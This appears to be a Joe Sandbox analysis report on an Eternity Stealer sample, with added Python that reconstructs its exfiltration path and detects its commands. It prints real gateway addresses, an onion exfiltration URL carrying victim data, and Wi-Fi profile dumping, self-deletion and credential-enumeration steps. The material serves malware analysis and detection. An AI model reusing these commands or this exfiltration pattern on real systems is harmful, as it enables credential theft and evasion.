                                                                            CF-RAY: 86bed7f3cc0d8011-IAD
2024-03-29 09:30:51 UTC | 186 | IN | Data Raw: 62 34 0d 0a 31 38 38 2e 31 36 36 2e 31 36 36 2e 31 34 32 3a 39 32 30 30 0d 0a 31 35 39 2e 36 35 2e 31 35 36 2e 32 33 37 3a 31 34 30 30 0d 0a 31 33 30 2e 31 38 35 2e 38 33 2e 37 36 3a 39 31 35 31 0d 0a 35 2e 31 30 2e 32 32 38 2e 32 34 38 3a 39 30 35 30 0d 0a 34 37 2e 32 34 32 2e 36 39 2e 31 31 32 3a 39 31 35 31 0d 0a 31 30 33 2e 37 35 2e 31 39 37 2e 31 36 3a 33 31 31 36 0d 0a 33 35 2e 32 33 38 2e 31 36 31 2e 32 34 33 3a 39 30 37 30 0d 0a 31 38 2e 31 31 39 2e 34 30 2e 38 30 3a 39 30 35 30 0d 0a 38 2e 32 32 32 2e 31 36 38 2e 31 39 32 3a 39 30 30 37 0d 0a
Data Ascii (one chunk of size b4 = 180 bytes; the CRLF line breaks the report flattened are restored, one host:port per line):
188.166.166.142:9200
159.65.156.237:1400
130.185.83.76:9151
5.10.228.248:9050
47.242.69.112:9151
103.75.197.16:3116
35.238.161.243:9070
18.119.40.80:9050
8.222.168.192:9007
2024-03-29 09:30:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0 (terminating zero-length chunk)
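The pastebin fetch and the POST in session 1 together give the full upload path: the sample pulls a list of host:port gateways from pastebin, then POSTs its archive to the first of them with a Host header naming the .onion address, and the victim fields ride in the URL as base64 query parameters. The Python below is an added example written for this page, not code from the Joe Sandbox report and not the sample's own code. It de-chunks the captured pastebin response, parses the gateway list, decodes the query parameters from the captured request line, and checks that the POST destination really is one of the listed gateways. The byte strings and the request line are copied from the capture above; the function names are mine.

```python
"""Reconstruct the Eternity Stealer upload path from the captured traffic.

Added example for this page, not code from the Joe Sandbox report or from the sample.
The byte strings below are copied from the capture; helper names are my own.
"""
from __future__ import annotations

import base64
from urllib.parse import parse_qs, urlsplit

# Body of GET /raw/X2Ddjiv0 (pastebin): nine host:port entries separated by CRLF,
# delivered as a single 0xb4 = 180 byte chunk followed by the terminating zero chunk.
PASTEBIN_PROXY_LIST = (
    b"188.166.166.142:9200\r\n"
    b"159.65.156.237:1400\r\n"
    b"130.185.83.76:9151\r\n"
    b"5.10.228.248:9050\r\n"
    b"47.242.69.112:9151\r\n"
    b"103.75.197.16:3116\r\n"
    b"35.238.161.243:9070\r\n"
    b"18.119.40.80:9050\r\n"
    b"8.222.168.192:9007"
)
PASTEBIN_RAW = b"b4\r\n" + PASTEBIN_PROXY_LIST + b"\r\n0\r\n\r\n"

# Request target and Host header of session 1 (the POST to the first listed gateway).
EXFIL_REQUEST_TARGET = (
    "/stld/4c9395d28d054ddebee26b2aa2a2c910"
    "?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D"
    "&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3"
)
EXFIL_HOST = "izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion"
EXFIL_DEST = ("188.166.166.142", 9200)   # destination IP and port of session 1


def dechunk(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: '<hex size>\\r\\n<data>\\r\\n' ... '0\\r\\n\\r\\n'."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += size + 2


def parse_proxy_list(text: str) -> list[tuple[str, int]]:
    """Turn the pastebin text into (host, port) pairs; lines that are not host:port are skipped."""
    proxies = []
    for line in text.splitlines():
        host, sep, port = line.strip().rpartition(":")
        if sep and host and port.isdigit():
            proxies.append((host, int(port)))
    return proxies


def decode_exfil_params(request_target: str) -> dict[str, str]:
    """Base64-decode each query parameter of the upload URL (u, p, i, co, ci, t)."""
    decoded = {}
    for key, values in parse_qs(urlsplit(request_target).query).items():
        try:
            decoded[key] = base64.b64decode(values[0], validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            decoded[key] = values[0]   # keep a non-base64 value as it was sent
    return decoded


def reconstruct_chain() -> dict:
    """Tie the observations together: gateway list, decoded victim fields, and whether
    the POST went to one of the listed gateways."""
    proxies = parse_proxy_list(dechunk(PASTEBIN_RAW).decode("ascii"))
    return {
        "proxies": proxies,
        "victim": decode_exfil_params(EXFIL_REQUEST_TARGET),
        "onion_host": EXFIL_HOST,
        "post_via_listed_proxy": EXFIL_DEST in proxies,
    }


if __name__ == "__main__":
    chain = reconstruct_chain()
    for host, port in chain["proxies"]:
        print(f"gateway  {host}:{port}")
    for key, value in chain["victim"].items():
        # u = username, i = public IP, co/ci = country/city as returned by the
        # ip-api.com lookup; what p and t encode is not established by this capture.
        print(f"param    {key} = {value!r}")
    print("POST sent to a listed gateway:", chain["post_via_listed_proxy"])
```

Decoded, the URL carries u=Albus, i=102.165.48.43, co=United States (US) and ci=Washington, which are exactly the values the sandbox received from ip-api.com a minute earlier; blocking or alerting on the pastebin fetch therefore cuts the chain before any data leaves, since the sample has no gateway to talk to without the list.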



                                                                            Target ID:0
                                                                            Start time:10:30:44
                                                                            Start date:29/03/2024
                                                                            Path:C:\Users\user\Desktop\Stealer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\Desktop\Stealer.exe"
                                                                            Imagebase:0xad0000
                                                                            File size:344'064 bytes
                                                                            MD5 hash:495F88115EABED181E30727F2D2363D3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_EternityStealer, Description: Yara detected Eternity Stealer, Source: 00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:10:30:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                            Imagebase:0x4a570000
                                                                            File size:345'088 bytes
                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:10:30:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\chcp.com
                                                                            Wow64 process (32bit):false
                                                                            Commandline:chcp 65001
                                                                            Imagebase:0xff240000
                                                                            File size:12'800 bytes
                                                                            MD5 hash:0C8C209151A45A4D7774E89C2F4079AA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:10:30:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\netsh.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:netsh wlan show profile
                                                                            Imagebase:0x1720000
                                                                            File size:87'040 bytes
                                                                            MD5 hash:637982A421D0133DCEAA0D1490D1DC9C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:10:30:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\findstr.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:findstr All
                                                                            Imagebase:0xffad0000
                                                                            File size:71'168 bytes
                                                                            MD5 hash:6A2E9BBD516D064C925A9634A5632854
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:10:31:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"
                                                                            Imagebase:0x4a0b0000
                                                                            File size:345'088 bytes
                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:10:31:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\chcp.com
                                                                            Wow64 process (32bit):false
                                                                            Commandline:chcp 65001
                                                                            Imagebase:0xff780000
                                                                            File size:12'800 bytes
                                                                            MD5 hash:0C8C209151A45A4D7774E89C2F4079AA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:10:31:46
                                                                            Start date:29/03/2024
                                                                            Path:C:\Windows\System32\PING.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:ping 127.0.0.1
                                                                            Imagebase:0xff1e0000
                                                                            File size:16'896 bytes
                                                                            MD5 hash:5FB30FE90736C7FC77DE637021B1CE7C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true
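The process tree above shows the two cmd.exe one-liners that are worth a detection rule: "chcp 65001 && netsh wlan show profile | findstr All" (Wi-Fi profile enumeration, run here with administrator rights) and "chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A <own path>" (self-deletion delayed by a ping to loopback). The Python below is an added example, not part of the Joe Sandbox report: it classifies process-creation records by command line and, for the delete pattern, compares the deleted path with the parent process image so that self-deletion is told apart from an ordinary delayed delete. The records are constructed to mirror Target IDs 2 and 7 above (the Sysmon Event ID 1 field names are an assumption), and the third record is a constructed delayed delete of an unrelated file to show the discriminator.

```python
"""Flag the two cmd.exe patterns from the process tree above on process-creation events.

Added example for this page, not part of the Joe Sandbox report. Records are
constructed to mirror the tree; the Image / ParentImage / CommandLine field names
follow Sysmon Event ID 1 and are an assumption.
"""
from __future__ import annotations

import re

# Wi-Fi profile enumeration. Listing profile names is step one; the key itself is
# dumped by a follow-up "netsh wlan show profile <name> key=clear", so treat this as
# the first event of a sequence rather than the whole technique.
WLAN_PROFILE_ENUM = re.compile(r"\bnetsh\s+wlan\s+show\s+profile\b", re.I)

# "ping 127.0.0.1 && DEL ... <path>": the ping is a portable sleep that lets the
# parent exit before its file is removed. The deleted path is captured for comparison.
DELAYED_DELETE = re.compile(
    r"\bping\s+(?:-n\s+\d+\s+)?127\.0\.0\.1\b.*?&&\s*del\s+"
    r'(?:/\w\s+)*"?(?P<target>[^"&|]+?)"?\s*$',
    re.I,
)


def classify(record: dict) -> list[str]:
    """Return the finding names that apply to one process-creation record."""
    cmd = record.get("CommandLine", "")
    findings = []
    if WLAN_PROFILE_ENUM.search(cmd):
        findings.append("wlan_profile_enumeration")
    match = DELAYED_DELETE.search(cmd)
    if match:
        target = match.group("target").strip().lower()
        parent = record.get("ParentImage", "").strip().lower()
        # Self-deletion: the parent asks cmd.exe to remove the parent's own image.
        if target == parent:
            findings.append("self_delete_of_parent_image")
        else:
            findings.append("delayed_delete_via_ping")
    return findings


# Constructed records mirroring Target IDs 2 and 7 above, plus a delayed delete of
# an unrelated file to show that only the parent-image case is rated as self-deletion.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\Stealer.exe",
     "CommandLine": '"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\Stealer.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 '
                    r'&& DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /C ping 127.0.0.1 && DEL /Q "C:\Users\user\tmp\build.log"'},
]


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Classify every record and return (index, findings) for the ones that hit."""
    hits = []
    for idx, event in enumerate(events):
        found = classify(event)
        if found:
            hits.append((idx, found))
    return hits


if __name__ == "__main__":
    for idx, found in scan(EVENTS):
        print(f"event {idx}: {', '.join(found)}  <- {EVENTS[idx]['CommandLine']}")
```

Comparing the DEL target with ParentImage is what keeps the rule quiet on build scripts and installers that also use ping-as-sleep; in this tree the match is exact, since the parent of Target ID 7 is C:\Users\user\Desktop\Stealer.exe and that is the path being deleted.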

Execution Graph

Execution Coverage: 25.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 6
Total number of Limit Nodes: 0

Execution graph summary (the interactive graph data is omitted): six nodes rooted at 7fe93d90a21. The executed path runs 7fe93d90a21 -> 7fe93d90a7e -> 7fe93d8aad0 -> 7fe93d90d00, where CredEnumerateW (the Windows Credential Manager enumeration API) is called, then returns through 7fe93d90dc8 to 7fe93d90a68; 7fe93d90a21 also branches directly to 7fe93d90a68.

Control-flow Graph

Legend: Executed / Not Executed

Control-flow graph summary (serialized graph data omitted): the function starting at 7fe93d998ed unrolls into a long straight-line chain of basic blocks (7fe93d99a2c through 7fe93d9c717). Each block calls a consecutive pair of small helpers (7fe93d81ae0/7fe93d81ae8, 7fe93d81af0/7fe93d81af8, ..., in the 7fe93d814xx-7fe93d81cxx range) followed by 7fe93d83fe0 and 7fe93d840c0, with a short conditional block that can skip into the next pair; the pattern repeats for roughly a hundred blocks before the function ends at 7fe93d9c717.
Strings
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID:
• String ID: 6)f_$BrG6$Fim$JS86$b.WR$qLxJ$uWsy$+`
• API String ID: 0-4240743467
• Opcode ID: c8c6e94e7c4bb8b607d77dc60372651641cd40e204ea7ca62725704429448371
• Instruction ID: 4af4dfb5fd038689e038a5c5d69306e955a60858fd2323c00e8f3a04db63decd
• Opcode Fuzzy Hash: c8c6e94e7c4bb8b607d77dc60372651641cd40e204ea7ca62725704429448371
• Instruction Fuzzy Hash: CC43E6B1E15A1D8FEBA0EB68CC55BD9B6F5FB98301F1041E5900CE3655EA78AEC08F41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph and edge list omitted; first listed basic block 7fe93da2784-7fe93da279f; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID:
• String ID: DH'$X3"Z${->w$,m
• API String ID: 0-3306116339
• Opcode ID: 5dcbb1583c168586154b59857d99a51465fb7eb6d229b3ee96e29d72442e9f0a
• Instruction ID: dac3dd20e2827bbf81aea0835aafe3952576ffe09e08946169a651a49d3aeabc
• Opcode Fuzzy Hash: 5dcbb1583c168586154b59857d99a51465fb7eb6d229b3ee96e29d72442e9f0a
• Instruction Fuzzy Hash: 3562F8B0E046198FEBA4DB68C8957E9B7F1FF98301F1441AAD00DE7765EB34A9818F41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph and edge list omitted; first listed basic block 7fe93d961b0-7fe93d961ba; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID:
• String ID: Ktx$S1z&$cQU,$hVU?
• API String ID: 0-1265154631
• Opcode ID: 74ce24f9316972193f09d219ee00640ad062eefee4890adfed4862c9ab2985d1
• Instruction ID: 345e07bf182315c46ad3d3168ebc7535de95f3ef83e7dab651a483f7ccd4c820
• Opcode Fuzzy Hash: 74ce24f9316972193f09d219ee00640ad062eefee4890adfed4862c9ab2985d1
• Instruction Fuzzy Hash: 43524C70E1561D8FEB94DBA8C8957EDB7B1FF98300F1041E9D00DE77A6DA34A9818B41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph and edge list omitted; first listed basic block 7fe93db2c2d-7fe93db2c39; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID:
• String ID: <WU$>2j$I`z
• API String ID: 0-1552865806
• Opcode ID: 5a76c664daba7cb5147f0c80d7698f1cefe782f0f7710ba04fec98de9b66b3b4
• Instruction ID: fe81f09b991d154bb2541c112481a69e0a2c6403f261f2e3188cc89d3480c61c
• Opcode Fuzzy Hash: 5a76c664daba7cb5147f0c80d7698f1cefe782f0f7710ba04fec98de9b66b3b4
• Instruction Fuzzy Hash: 5A42F871E14A1D8FEB90DBA8C8957DDB7F1FF98300F1441A6900CE77A5EA78A9818F41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph and edge list omitted; first listed basic block 7fe93dae211-7fe93dae23f; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID:
• String ID: "/?$v:6
• API String ID: 0-1173726457
• Opcode ID: 998356abb946a13669ccb78e83992358bf0ef3be82e917853ae4e27f4998d613
• Instruction ID: c58b5a8047d1cc06948fb193553428bf90ed6a7bf30544acbeb0aee2b7f4cd01
• Opcode Fuzzy Hash: 998356abb946a13669ccb78e83992358bf0ef3be82e917853ae4e27f4998d613
• Instruction Fuzzy Hash: 2762E8B1E1461D8FEB90EBA8C8957DDB7F5FB98300F1441A5900CE77A5EB34AA818F41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph and edge list omitted; first listed basic block 7fe93d940d5-7fe93d940db; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID:
• String ID: J}*_
• API String ID: 0-494607371
• Opcode ID: a33808c684c30a892028d9c9e3521570743ea7caaddb40e365fa2305273c8734
• Instruction ID: be94749f22893454021d9e23c511fb7552e82ac7cab4f868eddda1ae2db6122e
• Opcode Fuzzy Hash: a33808c684c30a892028d9c9e3521570743ea7caaddb40e365fa2305273c8734
• Instruction Fuzzy Hash: F262E430E09A498FEB95DB78C8557E9BBF1FF59300F1441EAD00DD72A2DA78A881CB51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph and edge list omitted; first listed basic block 7fe93d856f1-7fe93d856fd; legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID:
• String ID: HY{
• API String ID: 0-2631839145
• Opcode ID: 2076b2891475f5e7dc572083ce67596590c7a4701e5683a9bb7740a7fc84eb68
• Instruction ID: 904240919557f9eb5e3d554fde9da162819b42168c123a5e9b6efbf1313af51a
• Opcode Fuzzy Hash: 2076b2891475f5e7dc572083ce67596590c7a4701e5683a9bb7740a7fc84eb68
• Instruction Fuzzy Hash: F102A8B1E086498FDB49CBA8D8606FD7BF2EF95304F14417EE10AEB395E6386841CB05
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 76d1ee022d8d7fbd7037480d04467687bd48bb3fe74cfb853d9fcdf97a012828
• Instruction ID: 3ee69a6ba9f903cfacd4b88aadab84c4d429681bab9452b70a6652bbe4924b7a
• Opcode Fuzzy Hash: 76d1ee022d8d7fbd7037480d04467687bd48bb3fe74cfb853d9fcdf97a012828
• Instruction Fuzzy Hash: C6325330A18A054FDB48EB68D495B76B7F2FBD8301B1046BDD40DD76A6DA74F9808782
Uniqueness

Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a05f6a268f057e1ef55cf4049b409ca650fa126bbd2cdb2c49a246bfd8791f10
                                                                              • Instruction ID: 3bc134ca1259b9e3144845cfa67bf002e68be0e67dfb0d95d7f3148769be5297
                                                                              • Opcode Fuzzy Hash: a05f6a268f057e1ef55cf4049b409ca650fa126bbd2cdb2c49a246bfd8791f10
                                                                              • Instruction Fuzzy Hash: 4D321D30A1CA494FEB89EB6884557BA37E6FB89300F2401A9E40DC73E7DA74FC529751
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0b9c017275173324c1ea9f17d9998bb23d23126cdef4e1a58b0cc77696505556
                                                                              • Instruction ID: f93273b479d9dd10613d30d06185cd4eef79fa882b7311139fe9d1a260f640a0
                                                                              • Opcode Fuzzy Hash: 0b9c017275173324c1ea9f17d9998bb23d23126cdef4e1a58b0cc77696505556
                                                                              • Instruction Fuzzy Hash: 0C229230618A4A8FDB85EF28C494BB677E6FF98300F5044A9E40DC72A6DA35FC52DB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cfd541eb81af49db54e6477272fc6c636d9a26c86d107e69710b3107ec85a672
                                                                              • Instruction ID: b8bf7c002539e2a30e3d70343023b0d8eaa9f3009b79f81a556df5db3e58e2da
                                                                              • Opcode Fuzzy Hash: cfd541eb81af49db54e6477272fc6c636d9a26c86d107e69710b3107ec85a672
                                                                              • Instruction Fuzzy Hash: 89123430B189194FEB88EB6CD465BB973E2FB98300F5045A9900DD73A6DE78FC819791
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 02b4832d724ba47af948796aafd4d9adb14bb1e093904034ae60b04ef2f03698
                                                                              • Instruction ID: d8005018574abbe1eaae685ef77abe70837c9c7a0bd1e978498e3c8749eadfc6
                                                                              • Opcode Fuzzy Hash: 02b4832d724ba47af948796aafd4d9adb14bb1e093904034ae60b04ef2f03698
                                                                              • Instruction Fuzzy Hash: 5802F630A1C64A4FF799EBA894A53B973D6FBC4310F24117DD44FC35E2DE68B8426292
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fee34fb8e3c01d27fd16e34e49486635cf1252413b1dcd3dfb0f113fda445eaf
                                                                              • Instruction ID: f28ec6805c03a4cf0e7ad99b4595e7fdadcca497e7b15f0019611c7abacc0466
                                                                              • Opcode Fuzzy Hash: fee34fb8e3c01d27fd16e34e49486635cf1252413b1dcd3dfb0f113fda445eaf
                                                                              • Instruction Fuzzy Hash: E7E1C530908A4E8FEBA8DF28D8557F977E1FB94310F14426ED84DC76A5DB78B8418782
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef2ee46337bd2081d400ab8aae0283f726e07360c9af2774656d8737ac9288cb
                                                                              • Instruction ID: 3703f4c5533f222ba49e9558c2751e64a1a1a788581a582134ec110c493a4a38
                                                                              • Opcode Fuzzy Hash: ef2ee46337bd2081d400ab8aae0283f726e07360c9af2774656d8737ac9288cb
                                                                              • Instruction Fuzzy Hash: C9F1B630918A8D8FEBA9DF28C8557F977D1FB94301F14426ED84EC76A1DB74B8418B82
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

Control-flow Graph (graph image not recovered from the extracted text): basic blocks 7fe93d90cb1 through 7fe93d90e00; the block at 7fe93d90d81-7fe93d90dc6 calls CredEnumerateW.
APIs
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID: CredEnumerate
• String ID:
• API String ID: 3404281133-0
• Opcode ID: 8f68aa833cbc1f773568fe018be67de68f9f28fa24eab26d99fdb11ba35939a5
• Instruction ID: 933acd3f62eafa500f6eef2f0efb04d1426c2f9a81bc5293a7d4b949bd1a51b8
• Opcode Fuzzy Hash: 8f68aa833cbc1f773568fe018be67de68f9f28fa24eab26d99fdb11ba35939a5
• Instruction Fuzzy Hash: 39419D3180DA584FD718DB68AC066FA7BF4EB55321F04426FE04DD35A2CA787946C7D2
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (graph image not recovered from the extracted text): basic blocks 7fe93d8aad0 through 7fe93d90e00; the block at 7fe93d90d81-7fe93d90dc6 calls CredEnumerateW.
APIs
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID: CredEnumerate
• String ID:
• API String ID: 3404281133-0
• Opcode ID: 771d3109a86ac03c69811532fa6d5c3fb337f3cbf296a24b41a0761931289490
• Instruction ID: 60d29fe23c76b5355e681143aa81227a10eeebca850fdf7f78022863a6a5929d
• Opcode Fuzzy Hash: 771d3109a86ac03c69811532fa6d5c3fb337f3cbf296a24b41a0761931289490
• Instruction Fuzzy Hash: 3931D331908A188FDB18DB9C98457B977E5EBA8711F00426FD04ED3692CB70B8558BD1
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.466845232.000007FE93D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE93D80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7fe93d80000_Stealer.jbxd
Similarity
• API ID:
• String ID: 4S_^
